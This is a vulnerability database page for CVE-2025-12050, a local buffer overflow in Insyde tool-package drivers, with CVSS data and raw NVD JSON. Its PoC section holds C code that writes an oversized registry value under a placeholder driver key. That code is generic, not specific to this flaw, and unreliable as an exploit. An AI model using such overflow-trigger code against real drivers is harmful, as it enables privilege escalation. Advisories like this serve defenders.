Security Vulnerability Report
CVE-2025-12050 CVSS 7.8 HIGH

Published: 2026-01-14 01:15:50
Last Modified: 2026-04-15 00:35:42
Source: 8338d8cb-57f7-4252-abc0-96fd13e98d21

Description

The drivers in the tool packages use the RTL_QUERY_REGISTRY_DIRECT flag to read a registry value, through which an untrusted user-mode application may be able to cause a buffer overflow.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Insyde Security Pledge SA-2025010 affected drivers (all versions prior to patch)
Windows tool package drivers using RTL_QUERY_REGISTRY_DIRECT
Related firmware drivers < 2025-01-14 security update version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-12050 PoC - Registry Buffer Overflow Trigger
// This PoC demonstrates the concept of triggering a buffer overflow
// through malicious registry values read by drivers using RTL_QUERY_REGISTRY_DIRECT
#include <windows.h>
#include <stdio.h>
#include <string.h>

#define MALICIOUS_REG_PATH "SYSTEM\\CurrentControlSet\\Services\\VulnerableDriver"

int main() {
    HKEY hKey;
    DWORD dwDisposition;

    printf("[*] CVE-2025-12050 Registry Buffer Overflow PoC\n");
    printf("[*] Target: Driver using RTL_QUERY_REGISTRY_DIRECT\n\n");

    // Create or open the target registry key
    LONG lResult = RegCreateKeyExA(
        HKEY_LOCAL_MACHINE,
        MALICIOUS_REG_PATH,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        KEY_WRITE,
        NULL,
        &hKey,
        &dwDisposition
    );

    if (lResult != ERROR_SUCCESS) {
        // LONG is printed with %ld
        printf("[-] Failed to create registry key. Error: %ld\n", lResult);
        return 1;
    }

    printf("[+] Registry key created/opened successfully\n");

    // Create a malicious value with oversized data
    // This simulates the overflow condition that the driver will trigger
    char maliciousData[4096];
    memset(maliciousData, 0x41, sizeof(maliciousData)); // Fill with 'A'

    lResult = RegSetValueExA(
        hKey,
        "MaliciousValue",
        0,
        REG_BINARY,
        (LPBYTE)maliciousData,
        sizeof(maliciousData)
    );

    if (lResult == ERROR_SUCCESS) {
        printf("[+] Malicious registry value written successfully\n");
        // sizeof yields size_t, printed with %zu
        printf("[+] Value size: %zu bytes\n", sizeof(maliciousData));
        printf("[*] When driver reads this value via RTL_QUERY_REGISTRY_DIRECT,\n");
        printf("[*] it may trigger buffer overflow if buffer is smaller\n");
    }

    RegCloseKey(hKey);

    printf("\n[*] Note: This PoC creates the registry conditions but actual\n");
    printf("[*] exploitation requires specific driver with vulnerable code.\n");

    return 0;
}

References

https://www.insyde.com/security-pledge/sa-2025010/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12050", "sourceIdentifier": "8338d8cb-57f7-4252-abc0-96fd13e98d21", "published": "2026-01-14T01:15:49.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The drivers in the tool packages use RTL_QUERY_REGISTRY_DIRECT flag to read a registry value to which an untrusted user-mode application may be able to cause a buffer overflow."}, {"lang": "es", "value": "Los controladores en los paquetes de herramientas usan el indicador RTL_QUERY_REGISTRY_DIRECT para leer un valor de registro al cual una aplicación en modo de usuario no confiable podría ser capaz de causar un desbordamiento de búfer."}], "metrics": {"cvssMetricV31": [{"source": "8338d8cb-57f7-4252-abc0-96fd13e98d21", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "8338d8cb-57f7-4252-abc0-96fd13e98d21", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.insyde.com/security-pledge/sa-2025010/", "source": "8338d8cb-57f7-4252-abc0-96fd13e98d21"}]}}